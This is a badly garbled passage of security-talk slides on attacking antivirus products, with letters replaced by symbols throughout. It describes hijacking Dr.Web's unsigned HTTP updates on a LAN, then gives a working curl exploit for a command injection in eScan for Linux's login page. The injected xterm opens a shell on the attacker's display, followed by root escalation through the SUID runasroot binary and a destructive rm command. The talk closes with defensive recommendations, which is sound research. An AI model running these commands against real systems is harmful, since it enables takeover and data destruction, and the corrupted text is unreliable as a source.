In t*e !ata$og fi$e t*ere is a nu'%er of u&#ata%$e fi$es 5 a *as* for t*e',

-9B fi$es /-irus 9ataBases02 9r)e%>22#$$2

D*e *as* is, a!tua$$3, C(C>2 an# no !o'&onent is signe#, even t*e 9r)e%>22#$$ $i%rar32

*r;eb updating protocol

D*e hi!hest !rade of certificate reIuires t*e *ig*est gra#e of !*e!k for t*eir #ata%ase fi$es an# $i%raries, C(C>22 "i!h standards2 Do ex&$oit in a HAN inter!e&t t*e fo$$owing #o'ains,

u&#ate2nsk12#rwe%2!o' u&#ate2#rwe%2!o' u&#ate2'sk2#rwe%2!o' u&#ate2us2#rwe%2!o' u&#ate2'skM2#rwe%2!o' u&#ate2'sk?2#rwe%2!o' u&#ate2fr12#rwe%2!o' u&#ate2us12#rwe%2!o' u&#ate2nsk12#rwe%2!o'

222an# re&$a!e #rwe%>22#$$ wit* 3our @'o#ifie#A /$C'a;e#0 version2

*r;eb updating protocol

Ex&$oiting it is rat*er eas3 wit* etter!a& an# a Iui!k 83t*on we% server 5 7nix $C'a too$2

You on$3 nee# to !a$!u$ate t*e C(C>2 !*e!ksu' an# !o'&ress /$C'a0 t*e #rwe%>22#$$ fi$e2

I teste# t*e %ug un#er Hinux, fu$$ !o#e exe!ution is &ossi%$e2

D*oug* 3ou nee# to %e in a HAN to %e a%$e to #o so, o%vious$32

In '3 o&inion, t*is u&#ating &roto!o$ is *orri%$e2

e'can for 7inu"

eS!an is an A- &ro#u!t fro' 7SA /1i!ro)or$# De!*no$ogies02 I was %ore# so'e ran#o' nig*t in Singa&ore an# foun# t*at t*e eS!an &ro#u!t *ave a Hinux version2 I #own$oa#e# an# insta$$e# it /K1 *our %e!ause of t*e awfu$ *ote$;s !onne!tion02 D*en I starte# !*e!king w*at it insta$$s, fin#ing for S7I9 %inaries, et!222

D*e3 use Bit9efen#er an# C$a'A- engines, t*e3 #on;t *ave t*eir own engine so, no nee# to test t*e s!anners2

I a$rea#3 *a# vu$nera%i$ities for su!* engines222

D*e3 insta$$ a )e% server for 'anage'ent an# a S7I9 %inar3 !a$$e#,

4o&t41i!ro)or$#4s%in4runasroot

e'can for 7inu"

D*e S7I9 %inar3 a$$ows to exe!ute root !o''an#s to t*e fo$$owing users,

root 'w!onf /!reate# #uring insta$$ation02

D*e eS!an 'anage'ent a&&$i!ation /!a$$e# 1wA#'in0 is so f$awe# I #e!i#e# to sto& at t*e first (CE222

A !o''an# in:e!tion in t*e $ogin for' /8=802 In a @se!urit3A &ro#u!t2 Yes2

e'can for 7inu" login page

e'can for 7inu" re#ote root

D*is s&e!ifi! %ug reIuires to know4guess an existing user2 Not so *ar#2 D*e user na'e an# t*e &asswor# are use# to !onstru!t an o&erating s3ste' !o''an# exe!ute# via t*e 8=8;s fun!tion @exe!A2

I was not a%$e to in:e!t in t*e user na'e2 But I was a%$e to in:e!t in t*e &asswor#2

222

'ource code of login.php /I0

'ource code of login.php /II0

D*e &asswor# sent %3 t*e user is &asse# to !*e!kQuser,

D*ere are so'e ver3 %asi! !*e!ks against t*e &asswor#2

S&e!ia$$3 for s*e$$ es!a&e !*ara!ters2 But t*e3 forgot various ot*er !*ara!ters $ike ;<;2

'ource code of co##on=functions.php

D*en, t*e given &asswor# is use# in t*e fun!tion !*e!kQuser $ike t*is,

e'can for 7inu" 3%E

13 su&er.u$tra.ver3.txu&i.!o'&$ex ex&$oit for it,

$ xhost + $ curl data \ "product=1&[email protected]&pass=1234567; DISPLAY=YOURIP:0;xterm;" \ http://target:1

! /login.php

On!e 3ou;re in, run t*is to es!a$ate &rivi$eges,

$ /opt/"icro#orld/s$in/runasroot /usr/$in/xterm

Or an3t*ing e$se 3ou want222

$ /opt/"icro#orld/s$in/runasroot rm %v&r /'

Breaking antivirus software

Intro#u!tion Atta!king antivirus engines "in#ing vu$nera%i$ities

Initia$ ex&eri'ents

Ex&$oiting antivirus engines Antivirus vu$nera%i$ities %onclusions (e!o''en#ations

%onclusions

In genera$, A- software222

222#oesn;t 'ake 3ou an3 safer against ski$$e# atta!kers2 222in!rease 3our atta!k surfa!e2 222'ake 3ou 'ore vu$nera%$e to ski$$e# atta!kers2 222are as vu$nera%$e to atta!ks as an3 ot*er a&&$i!ation2 222'a3 $ower 3our o&erating s3ste' &rote!tions2 222are &$ague# of %ot* $o!a$ an# re'ote vu$nera%i$ities2 222#on;t give a fu!k a%out se!urit3 in t*eir &ro#u!ts2

So'e A- software222

So'e A- !o'&anies222

Breaking antivirus software

Intro#u!tion Atta!king antivirus engines "in#ing vu$nera%i$ities

Initia$ ex&eri'ents

Ex&$oiting antivirus engines Antivirus vu$nera%i$ities Con!$usions 3eco##endations

3eco##endations for AV users

9o not %$in#$3 trust 3our A- &ro#u!t2

BD), #o not trust 3our A- &ro#u!t2 A$so, #o not trust 3our A- &ro#u!t2 No&e2 I !annot stress it enoug*2

Iso$ate t*e 'a!*ines wit* A- engines use# for gatewa3s, network ins&e!tion, et!222 Au#it 3our A- engine or ask a >r# &art3 to au#it t*e A- engine 3ou want to #e&$o3 in 3our organiCation2

3eco##endations for AV co#panies

Au#it 3our &ro#u!ts, sour!e !o#e reviews L fuCCing2

No, A- !o'&aratives an# t*e $ike are not even re'ote$3 !$ose to t*is2 (unning a Bug Bount3, $ike Avast, is a ver3 goo# i#ea too2

9o not use t*e *ig*est &rivi$eges &ossi%$e for s!anning network &a!kets, fi$es, et!222

You #on;t nee# to %e root4s3ste' to s!an a network &a!ket or a fi$e2 You on$3 nee# root4s3ste' to get t*e !ontents of t*at &a!ket or fi$e2 Sen# t*e network &a!ket or fi$e !ontents to anot*er, $ow &rivi$ege# or san#%oxe#, &ro!ess2

3eco##endations for AV co#panies

(un #angerous !o#e un#er an e'u$ator, v' or, at t*e ver3 $east, in a san#%ox2 I on$3 know 2 A-s using t*is a&&roa!*2

9angerous !o#e, fi$e &arsers written in C4C55 !o#e2 If one fin#s a vu$nera%i$it3 an# it;s running insi#e an e'u$ator4san#%ox one nee#s a$so an es!a&e vu$nera%i$it3 to !o'&$ete$3 own t*e A- engine2

)*3 is it *ar#er to ex&$oit %rowsers or #o!u'ent rea#ers t*an se!urit3 &ro#u!ts+

Anot*er o&tion !ou$# %e to use a @saferA $anguage2 So'e A&ro#u!ts, a!tua$$3, are #oing t*is, 7sing Hua, for exa'&$e2 I;' not ta$king a%out signing t*e fi$es2 I;' ta$king a%out 3our A-;s running &ro!esses2

9o not trust 3our own &ro!esses2 D*e3 !an %e owne#2

3eco##endations for AV co#panies

9o not use &$ain =DD8 for u&#ating 3our &ro#u!t2

7se SSH4DHS2 A$so, #igita$$3 sign a$$ fi$es2

No, C(C is not a signature2 (ea$$32

222an# verif3 t*ere is not*ing e$se after t*e signature2

3eco##endations for AV co#panies

9ro& o$# !o#e t*at is of no use to#a3 or 'ake t*is !o#e not avai$a%$e %3 #efau$t2

Co#e for 1S.9OS era viruses, &a!kers, &rote!tors, et!222 8arsers for fi$e for'at vu$nera%i$ities in !o'&$ete$3 unsu&&orte# &ro#u!ts nowa#a3s2

Su!* o$# !o#e not tou!*e# in 3ears is $ike$3 to *ave vu$nera%i$ities2 D*is is u& to 3ou, w*at #o 3ou &refer+ "ai$ at stu&i# A!o'&aratives /A-.Dest, an3one+0 not #ete!ting viruses fro' t*e Jurassi! or *ave a 'ore se!ure &ro#u!t+

<uestions+